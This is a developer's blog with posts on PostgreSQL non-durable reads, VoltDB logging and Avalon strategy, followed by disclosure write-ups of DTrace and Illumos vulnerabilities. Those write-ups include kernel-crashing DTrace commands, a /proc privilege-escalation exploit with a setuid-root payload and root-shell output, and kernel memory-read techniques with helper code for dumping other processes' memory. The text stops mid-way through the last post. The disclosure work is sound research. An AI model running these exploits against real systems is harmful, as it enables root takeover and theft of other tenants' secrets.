Ben's Blog

Developer Musings

PostgreSQL Non-Durable Reads

This is an experiment where we try to find out how much faster Postgres will run if we patch it to support non-durable reads. PostgreSQL supports a number of commit options, but the ones we are interested in at the moment are synchronous_commit = on and synchronous_commit = off. When it is set to on, PostgreSQL will wait until the WAL is properly synchronized to disk before returning to the client; when it is off it will not wait at all. Also, when it is on, PostgreSQL will not release any locks or make any tuples visible to other transactions until the WAL is synchronized to disk. This means that if you have heavy write contention on a particular row then all of your connections can end up being serialized around fsync().

For example, take this query:

UPDATE counters set counter = counter + 1 where id = 0;

If you run this using pgbench with 128 clients on a MacBook Air with wal_sync_method = fsync and synchronous_commit = on you will get around 1283 transactions/s. This is with an fsync cost of about 0.2 ms. If you change to wal_sync_method = fsync_writethrough this increases the fsync cost to about 10 ms and the throughput drops to around 90 transactions/s. If you switch to synchronous_commit = off this will increase performance and you will get around 2611 transactions/s. However, this is kind of unsafe and you might lose transactions that you think have been committed if you have a sudden loss of power.
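
If you want to reproduce the contended-counter workload without pgbench, a rough Python harness like the one below works as a stand-in. It assumes the psycopg2 driver, a database reachable through the hypothetical DSN shown, and a counters table containing a row with id = 0; the client count and duration are arbitrary.

import threading
import time

import psycopg2  # assumed driver; any PostgreSQL client library will do

DSN = "dbname=test"   # hypothetical connection string
CLIENTS = 16          # the pgbench run in the post used 128
DURATION = 10         # seconds

def worker(counts, idx):
    conn = psycopg2.connect(DSN)
    cur = conn.cursor()
    deadline = time.time() + DURATION
    done = 0
    while time.time() < deadline:
        cur.execute("UPDATE counters SET counter = counter + 1 WHERE id = 0")
        conn.commit()  # with synchronous_commit = on this waits on the WAL fsync
        done += 1
    counts[idx] = done
    conn.close()

counts = [0] * CLIENTS
threads = [threading.Thread(target=worker, args=(counts, i)) for i in range(CLIENTS)]
for t in threads:
    t.start()
for t in threads:
    t.join()
print("%.0f transactions/s" % (sum(counts) / DURATION))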

Now, we have made a change to PostgreSQL to drop its locks and record the transaction as visible first, and only then wait for the WAL to be synchronised to disk. This gives you similar guarantees to synchronous_commit = on and similar performance to synchronous_commit = off when there is high contention. When there is low contention it has similar performance to synchronous_commit = on.

After this change we get 3321 transactions/s, which is about 2.5 times better performance than synchronous_commit = on and suspiciously even higher than synchronous_commit = off. Currently I don't have an explanation for this and it would seem to indicate that there is an implementation error in the patch. (Definitely do not trust this patch with real data; this is currently just an experiment.) I would expect that this new mode would perform strictly worse than synchronous_commit = off.

It is also important to note that using this setting, synchronous_commit = local_non_durable_reads, will produce read anomalies that are similar to the write anomalies you get with synchronous_commit = off. For example, if you insert a tuple and it fails a unique check, and you later try to read that tuple, it is possible it won't be there anymore because the original write was not durable when the read was performed for the unique check. But for this counter example it is 100% safe as long as you never try to read the value of the counter :)

If there is any interest in this I might try to upstream the patch into PG. I’m just not sure if there are people running with high enough contention and high enough fsync times to make this setting useful.

NonDurableReadPatch Benchmarks

VoltDB Command Logging Quirks

Since the last post on fsync and non-durable reads we have had a play around with VoltDB to see if our speculation about how synchronous command logging works is consistent with its performance.

The first thing we noticed is that read-only transactions wait for the log interval even if there are no previous write transactions waiting for their command log to be synced to disk. You can observe this by setting the log frequency to 5000 ms (the maximum) and using synchronous logging. Then, if you run an ad-hoc select statement from sqlcmd, you will notice that it sometimes takes the full 5 seconds to return a result. It is important to note that a read-only transaction will not wait for a disk sync if there are only read-only transactions in the command log buffer. But even without the sync, some read-only transactions will be unnecessarily delayed because they wait for the command log to be flushed. I have an LD_PRELOAD module that delays synchronization by 1 second and I never observed a read-only transaction taking more than 5 seconds to return a result. However, if there are write transactions in the buffer then the read-only transaction will wait for the command log to be synchronised (presumably the data from the read-only transaction isn't actually written). This waiting for previous write transactions to sync to disk prevents the non-durable read problem discussed in the previous post.

It is kind of weird that VoltDB unnecessarily stalls some read transactions, but this is probably not a big deal with real workloads because the frequency will be set to 1 ms, most workloads are a mix of reads and writes, and writes will always cause the command log to be synchronised.

Here are some links from VoltDB that explain how command logging works and how it can be configured for optimal performance.

FSync DB Lock Contention

Let's say you have a table in a database that you are using to keep track of a counter value. So something like:

Column |  Type   | Modifiers
--------+---------+-----------
 id     | integer | not null
 count  | integer | not null
Indexes:
    "test_pkey" PRIMARY KEY, btree (id)

If you have lots of connections updating values with the query update test set count = count + 1 where id = $1; then on PostgreSQL you should have very decent performance as long as the id values do not overlap too much. Even though PostgreSQL needs to fsync the WAL to disk for each commit, it is able to amortise this cost over many commits if the commits start to queue up because fsyncing is slow. For example the WAL fsyncs might be something like:

update test set count = count + 1 where id = 1
FSYNC WAL
update test set count = count + 1 where id = 2
update test set count = count + 1 where id = 3
..
update test set count = count + 1 where id = 100
FSYNC WAL
update test set count = count + 1 where id = 101
update test set count = count + 1 where id = 102
..
update test set count = count + 1 where id = 200
FSYNC WAL

However, if the id values overlap, and in the worst case if they are all the same, then not only do you have a problem with lock contention but you also have a problem with serializing all of the fsyncs. PostgreSQL, and presumably any sane RDBMS, will hold a write lock on the updated records until the transaction is durable. So you end up getting all the WAL fsyncs done in a completely serial order.

update test set count = count + 1 where id = 1
FSYNC WAL
update test set count = count + 1 where id = 1
FSYNC WAL
update test set count = count + 1 where id = 1
FSYNC WAL
update test set count = count + 1 where id = 1
FSYNC WAL

Before the land of SSDs this would be absolutely horrible. If you are paying 6 ms for an fsync then it completely destroys your throughput (166 fsync/s). But now with SSDs (or previously with battery-backed caches) the fsync cost is much lower, so this is less of an issue. For example with Amazon EBS I see an fsync cost of around 0.5 ms (2000 fsync/s) and i3 NVMe performance of ~0.05 ms (20000 fsync/s).
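
The fsync/s figures above are just the reciprocal of the fsync latency, since fully serialized commits can do at most one fsync at a time. A quick sanity check (the device labels are mine):

for device, fsync_seconds in [("spinning disk", 0.006), ("EBS", 0.0005), ("i3 NVMe", 0.00005)]:
    # serialized commits: one commit per fsync
    print("%-13s %6d fsync/s" % (device, 1.0 / fsync_seconds))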

Is it possible for an RDBMS to fix this fsync problem? When you think about it, an RDBMS could drop all the locks a transaction holds once it has decided that nothing except the WAL fsync would prevent it from committing. This would kind of work because another transaction that modified the same row would be dependent on the previous WAL segments committing before it could commit. However, this opens up a big consistency hole in the way clients interact with the database. For example you could see this happening:

TX1: BEGIN;
TX1: insert into test(id) values(1);
TX1: COMMIT;

<TX1 not fsync'd>

TX2: BEGIN;
TX2: insert into test(id) values(1);

<instead of blocking here for TX1 to commit it raises unique error>

DB: POWER FAILURE <TX1 is never committed>

Here we see a case where the second transaction observes data in the database that was not durable. It might think that because the record is already in the database it can do something else with an external system and then we end up having a problem. This particular case is also weird because the transaction gets in a state where it can’t be committed. If you successfully commit a transaction that has touched non-durable records then all the reads are safe because the records would now be durable after the commit. But a transaction with an error is not committable so you would also need to add a weird hook where a rollback (or implicit rollback) might have to wait for other transactions to fsync before returning to the client.

Also, transactions that did not modify data would normally have a no-op commit but if they were shown non-durable records they would need to potentially wait to commit.

Basically, it could kind of work as long as all transactions waited for a successful commit/rollback before acting on any data they read from the DB but this does not seem realistic.

If you look at VoltDB it looks like they only let you do transactions inside stored procedures. I've also seen a comment along the lines of them doing batch commits. Considering they are single-threaded, presumably they handle a bunch of transactions on the thread, add them to a queue that is fsynced in batches, and then the results from the stored procedures are sent back to the client. This presumably removes the consistency problems you have in a system with external transactions where non-durable reads can escape.

If you want to play around with PostgreSQL to see what effect WAL fsync delay has, I have an LD_PRELOAD library that will add 10 s to every fsync: wal_delayer

Mechanically Solving Avalon

I've been thinking for a while about whether it is possible for the 'good' team in Avalon to follow some optimal strategy that would always achieve victory. To simplify things this post will focus on finding an optimal strategy for 5-person Avalon when the Merlin (Commander) and the Assassin are both in play. It is important to note that in this variant the 'good' team can at best win on average 2/3 of games, because the 'evil' team can always randomly pick the Merlin at the end of the game and will guess correctly 1 in 3 times. This question has also been answered before on stackexchange, but we will try to answer it without crypto. That said, we will use something very similar to crypto and similar strategies, so I'm not sure if we are adding anything useful.

The 5 person Avalon game is interesting because there are only 2 ‘evil’ and 3 ‘good’ people. This creates an easy mechanism to solve the game.

  1. After the game has been set up everyone secretly writes down a list of the people they know are good. Merlin writes down the people they know are good. Other good people pretend to write down a list of people but instead write gibberish.

  2. The lists are shuffled.

  3. There will be either 1, 2 or 3 non-gibberish lists depending on what the ‘evil’ people do.

  4. If there is 1 non-gibberish list the 'good' team wins by just following the list because this is Merlin's list.

  5. If there are 2 or 3 non-gibberish lists then follow one list until it fails, then switch to another list. It is only possible for at most 2 missions to fail because after a list fails it is no longer used to pick teams. If only 2 missions fail then 3 missions succeed and the good team wins.

The strategy also shows why the Assassin is so important in the 5 player variant: without the Assassin the Commander could just announce themselves, and even if the evil team optimally bluffed and impersonated the Commander they would still be guaranteed to lose.

This strategy only works when there are 2 ‘evil’ players so only in the 5 and 6 player variants. Once a third ‘evil’ player is introduced it is possible to fail 3 missions using 3 evil lists.

Can we solve 7+ player games using this strategy?

If we have 3 evil players then we need to eliminate a list initially or run a mission that will eliminate two lists instead of one.

Unlike the stackexchange solution we don’t have a way to identify the author of a list so some of the strategies for eliminating lists do not work. However, we can still:

  1. If a mission fails then any list that contains all the members of the failing mission is also a bad list.

  2. If a mission fails and none of the members of the failing mission is in the complement of a list then this list is a bad list.

  3. Any members common to all lists are good.

To test whether evil players have a winning strategy it should be possible to brute force all the combinations of evil lists: 7C4^3 + 7C4^2 + 7C4 = 35^3 + 35^2 + 35 = 44135, and see if any of them can't be solved by an optimal good team.
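
A quick sanity check of that count, assuming each evil list is one of the C(7,4) = 35 possible 4-person lists in a 7-player game and that 1, 2 or 3 fake lists can be submitted:

from math import comb

lists = comb(7, 4)                   # 35 possible 4-person lists
total = lists**3 + lists**2 + lists  # 3, 2 or 1 fake lists from the evil team
print(total)                         # 44135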

Avalon Fonix/Grabyo Meta Snapshot

For those that don't know, Avalon (or The Resistance) is a board game where a 'good' team, which consists of the majority of players, attempts to pass 3 missions while an 'evil' team, which consists of a minority of the players, tries to sabotage them. The 'evil' team achieves this objective by convincing the other players to put them on missions and then failing the missions. The 'evil' team is in a better position to do this because they know who all the other 'evil' players are and can coordinate their voting or influence discussions to achieve their objective. On the other hand, the 'good' team is generally in the dark about the identity of the other players, with a few important exceptions.

We generally play 10 players with the Commander (Merlin), Bodyguard (Percival), Deep Cover (Mordred) and False Commander (Morgana) characters. The Commander knows who all the evil characters are except for Deep Cover. The Bodyguard knows who the Commander and False Commander are but doesn't know which is which. We also use the Lady of the Lake, which allows its holder, after the second round, to privately find out which team another player is on. The person being interrogated cannot lie, but the person receiving the information can lie or tell the truth to the rest of the table. The Lady of the Lake token then passes to the player that was interrogated and they get an opportunity to use it on the next round, and so forth. We also sometimes play only vanilla Resistance without characters but with plot cards.

Because we play a lot with each other some interesting behaviour has emerged. Firstly, we have a house technique which allows multiple evil players to coordinate failing a mission. For example, in a 3-player mission with two evil players it would be a disaster if both evil players put in a fail card. So it has evolved that the person who proposed the mission, or otherwise the first evil player clockwise from the proposer (the first evil player who will pick the next mission), is responsible for failing the mission. This removes a lot of deductive ability from the good team because it is difficult to assume that there is only 1 evil player in a mission if it fails.

We have also noticed that a lot of missions in the first round will be forced to the last pick because in the ten player games it is very difficult to get 6 good people (all the good people) to coordinate on picking a team. So generally the only way a mission passes before the last pick in the first round is because of evil shenanigans so good people are wary of voting for a team they are not on. This often means the position of the players has a large effect on the outcome of the game.

A lot of the games lately are being won by the good team but then the win is being overturned by the Assassin. In the latest game the Assassin's target was picked not because they provided the most useful information to the table (they actually did very little) but because they made no incorrect statements. The evil team is often very focused on finding the Commander, even to the detriment of getting a clean win.

DTrace Division by Zero

For some background check John Regehr’s excellent post on the history of problems caused by dividing INT_MIN by -1. DTrace is an interpreter that runs inside the kernel on both Illumos and OSX. Before it was patched in Illumos it was possible to create an expression to divide INT_MIN by -1 and this would cause the kernel to crash.

sudo dtrace -n 'BEGIN{v = 0x8000000000000000LL; print((long)v/-1)}'
sudo dtrace -n 'BEGIN{v = 0x8000000000000000LL; print((long)v%-1)}'

This is still an issue in OSX. I emailed them a month ago along with links to other DTrace issues that have been fixed in Illumos and not OSX and haven’t heard back. Since this is not really a security issue I’m posting it here. You need root in order to trigger the DTrace division by zero and if you have root you can already reboot the machine :/. You also need root to trigger all of the other issues.

Local Privilege Escalation in Illumos via /proc

The /proc permission checks in Illumos were effectively optional. I'm not sure how long this has been an issue, but looking at the history of the files associated with the permission check I could not find where the problem was introduced. I checked if this was also an issue in Solaris, but it had been fixed there. However, I could not find the CVE associated with this fix. My suspicion is that this has been an issue since prior to the Illumos fork and was found by Solaris engineers and fixed in Solaris but not in Illumos.

I found this vulnerability when I was looking for an RBAC bypass. RBAC in Solaris lets you have different named privileges associated with each process. It is possible for a process with a lot of privileges to drop most of them and keep only the ones that it needs. I thought it might be possible for a low-privilege process to use /proc to debug a process owned by the same user that had higher privileges. This was because I thought the filesystem permissions would be the only permission check that would be performed. But if I had checked the man page I would have seen:

EPERM


An attempt was made to control a process of which the E, P, and I privilege sets were not a subset of the effective set of the controlling process or the limit set of the controlling process is not a superset of limit set of the controlled process.

But I didn’t check the man page and just tried to write to a /proc file of a higher privileged process using bash.

echo "wat" > /proc/23912/lwp/1/lwpctl

Which instead of giving a permission error gave back an I/O error.

This issue can be demonstrated via the following commands:

First, we drop the sys_mount privilege, which will prevent us from opening /proc on our parent bash process because our limit set is no longer a superset of the parent's limit set.

ppriv -s A-sys_mount -e /bin/bash
[root@web01 ~]# ppriv $$
23929:  /bin/bash
flags = PRIV_AWARE
        E: basic
        I: basic
        P: basic
        L: basic,contract_event,contract_identity,contract_observer,dtrace_proc,dtrace_user,file_chown,file_chown_self,file_dac_execute,file_dac_read,file_dac_search,file_dac_write,file_owner,file_setid,ipc_dac_read,ipc_dac_write,ipc_owner,net_bindmlp,net_icmpaccess,net_mac_aware,net_observability,net_privaddr,net_rawaccess,proc_audit,proc_chroot,proc_lock_memory,proc_owner,proc_prioup,proc_setid,proc_taskid,sys_acct,sys_admin,sys_audit,sys_fs_import,sys_ip_config,sys_iptun_config,sys_nfs,sys_ppp_config,sys_resource,sys_smb

Next, we try to open the parent process's lwpctl file and it correctly fails.

[root@web01 ~]# ps
  PID TTY         TIME CMD
23929 pts/4       0:00 bash
23911 pts/4       0:00 login
23912 pts/4       0:00 bash
23935 pts/4       0:00 ps

python

>>> os.open("/proc/23912/lwp/1/lwpctl", os.O_WRONLY)
Traceback (most recent call last):
  File "<stdin>", line 1, in <module>
OSError: [Errno 13] Permission denied: '/proc/23912/lwp/1/lwpctl'

Next, we open the file with O_CREAT and it incorrectly succeeds.

>>> os.open("/proc/24421/lwp/1/lwpctl", os.O_CREAT|os.O_APPEND|os.O_WRONLY)
3

In Illumos there is the concept of a vnode, which contains a bunch of pointers to methods that are used by the kernel to interact with the filesystem. When a file is opened the kernel will call the #access method on the vnode first and then call the open method on the vnode if the #access succeeds. However, when O_CREAT is passed the kernel will only call the #create method and will assume the #create method also performs the #access check. In the case of the /proc filesystem this was not happening, so anybody could pass in O_CREAT and no permission check would occur, meaning the open would always succeed. Since there are no other checks, not only does this work as an RBAC bypass, it also works as a privilege escalation from non-root to root. It is important to note that Zones contain this issue and it doesn't seem possible to use it as a way of escalating your privileges outside of a Zone.

If you look at the patch you can see a call to #praccess was added and some other checks as well that I don’t understand.

I notified Joyent about this on the 14th of December and they had a fix committed by the 17th. The advisory from Joyent is available here. The Joyent people are probably quietly cheering on the demise of Solaris because, as you can see from this vulnerability, security issues can be fixed in Solaris while Illumos remains vulnerable. One way of looking at this is that Oracle is selling a zero-day exploit feed for Joyent's public cloud. Though it is probably not that bad because the code bases have diverged a bit.

Exploit

I have an exploit for this that will use the lwp_agent to create a file /tmp/elevator that is suid root. It also uses the lwp_agent to write a program to this file that contains:

  char *argv[] = { "/bin/bash", NULL };
  setuid(0);
  setgid(0);
  execv("/bin/bash", argv);

It can be compiled via:

  gcc -nostdlib -static bash.s -o bash
  gcc -o go go.c

Example output:

  root@web01:~# id
  uid=1000(ben) gid=1(other) groups=1(other)

  root@web01:~# ppriv $$
  36695:  sh
  flags = <none>
    E: basic
    I: basic
    P: basic
    L: basic,contract_event,contract_identity,contract_observer,dtrace_proc,dtrace_user,file_chown,file_chown_self,file_dac_execute,file_dac_read,file_dac_search,file_dac_write,file_owner,file_setid,ipc_dac_read,ipc_dac_write,ipc_owner,net_bindmlp,net_icmpaccess,net_mac_aware,net_observability,net_privaddr,net_rawaccess,proc_audit,proc_chroot,proc_lock_memory,proc_owner,proc_prioup,proc_setid,proc_taskid,sys_acct,sys_admin,sys_audit,sys_fs_import,sys_ip_config,sys_iptun_config,sys_mount,sys_nfs,sys_ppp_config,sys_resource,sys_smb

  root@web01:~# ps auxww |grep vi
  root     36626  0.0  0.2 5012 3344 pts/2    S 21:48:50  0:00 vi /tmp/test


  root@web01:~# ./go 36626
  found syscall: fefe2255
  file_size: 1464 8046a50
  write returned: 1464
  [root@web01 /root]# id
  uid=0(root) gid=0(root)
  [root@web01 /root]# ppriv $$
  36724:  /bin/bash
  flags = <none>
    E: basic,contract_event,contract_identity,contract_observer,dtrace_proc,dtrace_user,file_chown,file_chown_self,file_dac_execute,file_dac_read,file_dac_search,file_dac_write,file_owner,file_setid,ipc_dac_read,ipc_dac_write,ipc_owner,net_bindmlp,net_icmpaccess,net_mac_aware,net_observability,net_privaddr,net_rawaccess,proc_audit,proc_chroot,proc_lock_memory,proc_owner,proc_prioup,proc_setid,proc_taskid,sys_acct,sys_admin,sys_audit,sys_fs_import,sys_ip_config,sys_iptun_config,sys_mount,sys_nfs,sys_ppp_config,sys_resource,sys_smb
    I: basic
    P: basic,contract_event,contract_identity,contract_observer,dtrace_proc,dtrace_user,file_chown,file_chown_self,file_dac_execute,file_dac_read,file_dac_search,file_dac_write,file_owner,file_setid,ipc_dac_read,ipc_dac_write,ipc_owner,net_bindmlp,net_icmpaccess,net_mac_aware,net_observability,net_privaddr,net_rawaccess,proc_audit,proc_chroot,proc_lock_memory,proc_owner,proc_prioup,proc_setid,proc_taskid,sys_acct,sys_admin,sys_audit,sys_fs_import,sys_ip_config,sys_iptun_config,sys_mount,sys_nfs,sys_ppp_config,sys_resource,sys_smb
    L: basic,contract_event,contract_identity,contract_observer,dtrace_proc,dtrace_user,file_chown,file_chown_self,file_dac_execute,file_dac_read,file_dac_search,file_dac_write,file_owner,file_setid,ipc_dac_read,ipc_dac_write,ipc_owner,net_bindmlp,net_icmpaccess,net_mac_aware,net_observability,net_privaddr,net_rawaccess,proc_audit,proc_chroot,proc_lock_memory,proc_owner,proc_prioup,proc_setid,proc_taskid,sys_acct,sys_admin,sys_audit,sys_fs_import,sys_ip_config,sys_iptun_config,sys_mount,sys_nfs,sys_ppp_config,sys_resource,sys_smb

Arbitrary Kernel Memory Reads on Illumos

Illumos is the name of the operating system that was forked from OpenSolaris and is being used to power Joyent’s Triton cloud platform. Joyent have their own branded version of Illumos called SmartOS. Joyent’s cloud is interesting because they offer hosting using Zones where customers share the same kernel. This is in contrast to traditional cloud providers who provide isolation between customers using virtual machines. However, it seems that kernel provided isolation is becoming more popular. Looking at AWS Lambda it appears that Linux kernel namespaces are being used to provide isolation. Because the kernel is used to provide isolation it means the whole of the kernel becomes an attack surface. This is especially interesting in the case of Illumos because Illumos runs an interpreter inside the kernel called DTrace which is one of the big selling points of Triton.

DTrace is an incredibly complex piece of code; it consists of more than 17k lines of C. It is very difficult to write this amount of C code without introducing lots of bugs :( During my review of the DTrace source code I stumbled across two integer overflows and an out-of-bounds read that could be converted to arbitrary kernel writes. I also found five bugs that could be used for arbitrary memory reads. I find exploitation of these arbitrary memory reads more interesting than the privilege escalation bugs so I'm going to write about four of them first. I intend to write up the other bugs, but these were disclosed starting from September 2015 so don't hold your breath.

DTrace Copy Out

If you look at the DTrace user guide it has this definition for the copyout function:

void copyout(void *buf, uintptr_t addr, size_t nbytes)

The `copyout()` action copies data from a buffer to an address in memory. The number of bytes that this action copies is specified in nbytes. The buffer that the data is copied from is specified in buf. The address that the data is copied to is specified in addr. That address is in the address space of the process that is associated with the current thread.

When you call copyout this code is run by DTrace:

case DIF_SUBR_COPYOUT: {
  uintptr_t kaddr = tupregs[0].dttk_value;
  uintptr_t uaddr = tupregs[1].dttk_value;
  uint64_t size = tupregs[2].dttk_value;

  if (!dtrace_destructive_disallow &&
      dtrace_priv_proc_control(state, mstate) &&
      !dtrace_istoxic(kaddr, size)) {
    DTRACE_CPUFLAG_SET(CPU_DTRACE_NOFAULT);
    dtrace_copyout(kaddr, uaddr, size, flags);
    DTRACE_CPUFLAG_CLEAR(CPU_DTRACE_NOFAULT);
  }
  break;
}

Unfortunately, copyout does exactly what it says on the tin. It copies out kernel memory into userspace without any checks :(. The kaddr and size values are completely controlled by the user. If we check the rest of the call path there is no code that checks that the user is allowed access to the range specified by kaddr and size. In fact, there is a function specifically designed to check this called dtrace_canload but this was not used. The patch fixes this issue by adding a dtrace_canload check:

  if (!dtrace_destructive_disallow &&
        dtrace_priv_proc_control(state, mstate) &&
-        !dtrace_istoxic(kaddr, size)) {
+        !dtrace_istoxic(kaddr, size) &&
+        dtrace_canload(kaddr, size, mstate, vstate)) {

Exploiting Arbitrary Memory Reads

At first glance there doesn't seem to be that much interesting stuff to read from kernel memory on Illumos. Illumos doesn't have KASLR, so there is no KASLR to bypass with an arbitrary memory read. It should be possible to dump the filesystem buffer cache or even kernel SLABs used for syscall args, which could hold sensitive information from other processes on the system, but I didn't pursue this option.

It would be great if you could dump memory from other processes, but this is not directly possible on x86 because only the currently running process and the kernel are mapped into memory. However, luckily for us, 64-bit Illumos maps all of physical memory at a known address in the kernel's virtual address space. I think this is done to make it easier to set up page tables. So all you have to do to read the memory of another process is convert the virtual address you want to read into a physical address and then add that physical address to the kernel physical map offset (kpm_vbase). This is all possible because the information needed to do this is inside the kernel's memory and we have an arbitrary kernel memory read. The locations of static symbols like kpm_vbase are also helpfully exported by the kernel (they are not really secret anyway because there is no KASLR) and can be accessed using a library called libctf. That doesn't stand for lib capture the flag :(
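
As a rough sketch of the translation step, assuming a read64() wrapper around whichever kernel read primitive you have, the kpm_vbase value pulled out via libctf, and the physical address of the target process's top-level page table, and ignoring 2 MiB/1 GiB large pages:

PHYS_MASK = 0x000ffffffffff000   # bits 12..51 of an x86-64 page-table entry

def read_phys(read64, kpm_vbase, paddr):
    # all of physical memory is mapped at kpm_vbase, so reading a physical
    # address is just a kernel-virtual read at kpm_vbase + paddr
    return read64(kpm_vbase + paddr)

def virt_to_phys(read64, kpm_vbase, table_root_pa, vaddr):
    # generic 4-level x86-64 page walk (4 KiB pages only);
    # table_root_pa is the physical address of the target's top-level table
    pa = table_root_pa
    for shift in (39, 30, 21, 12):
        index = (vaddr >> shift) & 0x1ff
        entry = read_phys(read64, kpm_vbase, pa + index * 8)
        if not entry & 1:        # present bit clear: not mapped
            return None
        pa = entry & PHYS_MASK
    return pa | (vaddr & 0xfff)

With those two helpers, dumping another process's memory is just virt_to_phys() followed by read_phys(), one word at a time.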

We can also get a list of all the running processes from the practive linked list. Normally when you are inside a Zone you can only see processes inside your own Zone. This allows us to create a tool that can be plugged in with an arbitrary kernel memory read and provide us with a ps that will dump all the processes running on the system and allow us to dump the memory contained in these processes.

Here is an example session with the tool being used to dump the heap from a vim process running in the global zone:

./global_ps

PID COMMAND PSARGS BRKBASE
8024 global_ps ./global_ps 0x414b90
8015 vim vim secret.txt 0x81f8be8

./global_ps segment -p 8015

ADDRESS SIZE FLAGS
0xfec2f000 4096
0x81ef000 188416 [heap]

./global_ps dump -p 8015 -a 0x81ef000 -s 188416 > dump

In a shared system this can be very dangerous because you can read private keys and authentication information from other processes. It also shows that relatively benign vulnerabilities can be very serious on systems that are used for shared hosting.

POC Code on Github

DTrace INET_NTOA

This is a similar issue to the copyout problem. This is what the DTrace user guide has to say about inet_ntoa:

string inet_ntoa(ipaddr_t *addr)

inet_ntoa takes a pointer to an IPv4 address and returns it as a dotted quad decimal string. This is similar to inet_ntoa() from libnsl as described in inet(3SOCKET), however this D version takes a pointer to the IPv4 address rather than the address itself. The returned string is allocated out of scratch memory, and is therefore valid only for the duration of the clause. If insufficient scratch space is available, inet_ntoa does not execute and an error is generated.

The code for the inet_ntoa function does not do any checking to see if the addr is allowed to be accessed.

case DIF_SUBR_INET_NTOA:
case DIF_SUBR_INET_NTOA6:
case DIF_SUBR_INET_NTOP: {
  size_t size;
  int af, argi, i;
  char *base, *end;

  if (subr == DIF_SUBR_INET_NTOP) {
    af = (int)tupregs[0].dttk_value;
    argi = 1;
  } else {
    af = subr == DIF_SUBR_INET_NTOA ? AF_INET: AF_INET6;
    argi = 0;
  }

  if (af == AF_INET) {
    ipaddr_t ip4;
    uint8_t *ptr8, val;

    /*
     * Safely load the IPv4 address.
     */
    ip4 = dtrace_load32(tupregs[argi].dttk_value);

The tupregs[argi].dttk_value value can be controlled by the user and there is no call to dtrace_canload. The comment about 'Safely' is misleading in this context because dtrace_load32 only prevents the kernel from panicking on a bad load and prevents access to memory-mapped IO regions; it does not check that the caller is allowed to read the address. So by using inet_ntoa we can read 4 bytes of arbitrary kernel memory. We just need to parse the dotted IP address back into bytes.
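
Turning the dotted-quad output back into raw bytes is straightforward. A minimal sketch, assuming a hypothetical leak4() helper that runs the inet_ntoa probe at a given kernel address and returns the string DTrace printed (the octets come out in memory order, as the _mmu_pagemask example below shows):

def dotted_to_bytes(dotted):
    # "0.240.255.255" -> b'\x00\xf0\xff\xff'
    return bytes(int(octet) for octet in dotted.split('.'))

def read_range(leak4, addr, length):
    # leak4(addr) is the hypothetical wrapper around the inet_ntoa() probe
    out = bytearray()
    for offset in range(0, length, 4):
        out += dotted_to_bytes(leak4(addr + offset))
    return bytes(out[:length])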

This bug is interesting because it can be demonstrated from the command line.

>  dtrace -n 'BEGIN{ print(inet_ntoa((in_addr_t*)&`_mmu_pagemask))}'
dtrace: description 'BEGIN' matched 1 probe
CPU     ID                    FUNCTION:NAME
  0      1                           :BEGIN string "0.240.255.255"

From the global zone we can verify it has read the 4 bytes 0x00f0ffff

> echo '_mmu_pagemask::dump'| mdb -k
                    0 1 2 3  4 5 6 7 \/ 9 a b  c d e f  01234567v9abcdef
fffffffffb94a1d0:  ff0f0000 00000000 00f0ffff ffffffff  ................

We can plug this vulnerability into our framework and use it to list processes and dump their memory contents. You might be concerned that reading 4 bytes at a time is slow, but there is no noticeable delay when listing processes.

POC Code on Github

DTrace Hash Corruption

DTrace has support for hashmaps and allows the user to access the data in the hashmap using the store and load instructions. DTrace tries to separate the metadata from the data and only allow the user to modify the data. However, it is possible to modify the metadata and this allows an attacker to create a memory oracle. An attacker can choose an address and an array of bytes and check whether the memory at that address is equal to the array of bytes. This is equivalent to a slow arbitrary memory read because you can check all 256 possible values to read a single byte of memory.

In dtrace_canstore it checks that the offset into the hash chunk is at least the size of dtrace_dynvar_t.

https://github.com/joyent/illumos-joyent/blob/release-20151224/usr/src/uts/common/dtrace/dtrace.c#L679

chunkoffs = (addr - base) % dstate->dtds_chunksize;

if (chunkoffs < sizeof (dtrace_dynvar_t))
  return (0);

Presumably, it is doing this to prevent the user from writing to the metadata in the hash chunk and the author believed all the metadata is contained in the dtrace_dynvar_t structure. This belief is true but dtrace_dynvar_t is a dynamically sized structure with the embedded structure dtrace_tuple containing a dynamically sized array of dtrace_key structures.

typedef struct dtrace_dynvar {
  uint64_t dtdv_hashval;      /* hash value -- 0 if free */
  struct dtrace_dynvar *dtdv_next;  /* next on list or hash chain */
  void *dtdv_data;      /* pointer to data */
  dtrace_tuple_t dtdv_tuple;    /* tuple key */
} dtrace_dynvar_t;

typedef struct dtrace_tuple {
  uint32_t dtt_nkeys;     /* number of keys in tuple */
  uint32_t dtt_pad;     /* padding */
  dtrace_key_t dtt_key[1];    /* array of tuple keys */
} dtrace_tuple_t;

typedef struct dtrace_key {
  uint64_t dttk_value;      /* data value or data pointer */
  uint64_t dttk_size;     /* 0 if by-val, >0 if by-ref */
} dtrace_key_t;

So if there is more than one key then an attacker is able to write into the key values beyond the first one. The dttk_value field is treated as a pointer if the dttk_size field is non-zero.

Unfortunately, the only place where the dttk_value field seems to be used is as an argument to the dtrace_bcmp function. When the hashmap looks up a value and finds a matching entry based on the hash code, it checks that the keys are equal using dtrace_bcmp.

https://github.com/joyent/illumos-joyent/blob/release-20151224/usr/src/uts/common/dtrace/dtrace.c#L1791

for (i = 0; i < nkeys; i++, dkey++) {
  if (dkey->dttk_size != key[i].dttk_size)
    goto next; /* size or type mismatch */

  if (dkey->dttk_size != 0) {
    if (dtrace_bcmp(
        (void *)(uintptr_t)key[i].dttk_value,
        (void *)(uintptr_t)dkey->dttk_value,
        dkey->dttk_size))
      goto next;
  } else {
    if (dkey->dttk_value != key[i].dttk_value)
      goto next;
  }
}

So we don’t have a direct read or write primitive but we can tell indirectly if a piece of memory is identical to the value the dttk_value field points to. We can do this by:

  1. Storing a value in the hash with two keys: a first dummy key and a second key which is the byte we want to check, i.e.:

      buf[0] = 0xff; hash[1, buf] = "h"
    
  2. We can find the address of the dttk_value field for the second key by doing:

     addr = (&hash[1, buf][0]) - 0x28
    

    Example showing the address of the value:

     [root@web01 ~]# dtrace -n 'char buf[1]; BEGIN {buf[0]=0xff;hash[1,buf]="h";addr = (&hash[1, buf][0]); print(addr)}'
     dtrace: description 'char buf[1]' matched 1 probe
     CPU     ID                    FUNCTION:NAME
       0      1                           :BEGIN char * 0xffffff00efa5c2d8
    

    If you look at the memory layout in the kernel the address of the key is clearly 0x28 behind the value (0x68):

     0xffffff00efa5c2d8-0x28,0x28::dump
    
                         \/
     0xffffff00efa5c2b0: d0c2a5ef 00ffffff 01000000 00000000
     0xffffff00efa5c2c0: 01000000 00000000 00000000 00000000
     0xffffff00efa5c2d0: ff000000 00000000 68000000 00000000
    
